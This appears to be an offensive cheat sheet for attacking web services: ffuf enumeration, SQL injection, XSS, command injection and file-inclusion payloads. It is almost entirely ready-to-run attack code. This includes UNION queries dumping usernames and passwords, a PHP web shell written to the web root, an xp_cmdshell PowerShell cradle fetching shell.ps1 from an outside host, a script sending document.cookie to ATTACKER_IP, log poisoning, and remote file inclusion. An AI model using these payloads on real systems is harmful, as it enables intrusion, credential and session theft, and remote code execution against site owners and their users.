Web HTTP/HTTPS (80/443)

Enumeration

Technology Detection

whatweb
wappalyzer
curl -I http://<HOST>

Directory Brute Force

#Initial Scan
ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -fc 404 -t 50

#Deeper Scan
ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -fc 404 -t 50

#Recursive Scan
ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -fc 404 -recursion -recursion-depth 2 -t 50

#Lists
/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

File Brute Force

ffuf -u http://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -e .php,.txt,.bak,.old,.zip -fc 404 -t 50

#(.asp,.aspx,.config) ISS

Sub-Domain Brute Force

ffuf -u http://FUZZ.<HOST> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 40

Virtual Host Brute Force

ffuf -u http://<IP> -w /usr/share/seclists/Discovery/Web-Content/common.txt -H 'Host: FUZZ.<HOST>' -fc 404 -fs <size> -t 40

Parameter Fuzzing

#Hidden Value
ffuf -u http://<HOST>/page.php?FUZZ=test -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 20

#Value Fuzzing
ffuf -u http://<HOST>/page.php?id=FUZZ -w /usr/share/seclists/Fuzzing/3-digits-000.txt -t 20

#POST Fuzzing
ffuf -u http://<HOST>/login -X POST -d "username=FUZZ&password=test" -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 20

#Lists
/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt
/usr/share/seclists/Fuzzing/3-digits-000.txt
/usr/share/seclists/Usernames/top-usernames-shortlist.txt
/usr/share/seclists/Discovery/Web-Content/common.txt

SQL Injection (SQLI)

Curl

curl "http://target/item.php?id=1<PAYLOAD>"

//Example Time-Based
curl "http://target/item.php?id=1' OR SLEEP(5)-- -"

Basic Injections

#Detection
'
"
`

#Boolean-Based Injection
' OR 1=1--
' OR 1=2--
' OR '1'='1'--
' OR '1'='2'--

' AND 1=1--
' AND 1=2--

#Logic Bypass
admin'--
admin'#
admin' OR '1'='1'--
' OR 1=1--

#Different Databases
--  (space often required)
-- -
#
/*

Union Injections

//Order By → find column count
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--

//Column reflection → find which column prints
' UNION SELECT 1,2,3--

//Null method → match column count
' UNION SELECT NULL,NULL,NULL--

//Credential / Table dump
' UNION SELECT username,password,NULL FROM users--
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--

//File Read
' UNION SELECT LOAD_FILE('/etc/passwd'),NULL,NULL--

//File Write
' UNION SELECT "<?php system($_GET['cmd']); ?>",NULL,NULL INTO OUTFILE '/var/www/html/shell.php'--

Time Based Injection

#MySQL
' OR SLEEP(5)-- -

#Conditional
' AND IF(1=1,SLEEP(5),0)-- -

#MSSQL
'; WAITFOR DELAY '0:0:5'--

#PostgreSQL
'; SELECT pg_sleep(5)--

Enumeration Injection

//List Database Version
' UNION SELECT @@version,NULL,NULL--

//DB Name
' UNION SELECT database(),NULL,NULL--

//List Tables
' UNION SELECT schema_name,NULL,NULL FROM information_schema.schemata--

//List Columns
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--

//Dump
' UNION SELECT username,password,NULL FROM users--

Command Execution Injection

'; EXEC sp_configure 'xp_cmdshell',1--

';exec xp_cmdshell 'powershell -e JABjAGwAaQBlA...

'; EXEC xp_cmdshell 'whoami'--

'; EXEC xp_cmdshell 'powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://IP/shell.ps1')"--

Command Injection

;id
|id
`id`
$(id)

Cross Site Scripting (XSS)

#Reflected - Payload in URL
#Stored - Executes whenever a user loads the page
//Examples: forum posts, comment sections, profile bios, Saved in database
#DOM - JavaScript processes input

# Testing XSS in URL parameters
http://target/search?q=<script>alert(1)</script>

#Testing XSS in forms
//comments, contact forms, profile fields
Submit: <script>alert(1)</script>

#Testing XSS
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
"><script>alert(1)</script>
javascript:alert(1)

Cookie Stealing

nc -lvnp 80
<script>fetch('http://ATTACKER_IP/?c='+document.cookie)</script>

Local File Inclusion (LFI)

#Basic Traversal
../../../../etc/passwd
../../../../windows/win.ini

#Basic Bypass
....//....//....//....//etc/passwd

#Encoded Traversal
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252fetc%252fpasswd

#PHP Wrapper
php://filter/convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=config

#Log Poisoning
curl -A "<?php system($_GET['cmd']); ?>" http://target/

#Include Log
/var/log/apache2/access.log

#Session Files
/var/lib/php/sessions/sess_<ID>

#RFI
http://target/page.php?file=http://ATTACKER_IP/shell.txt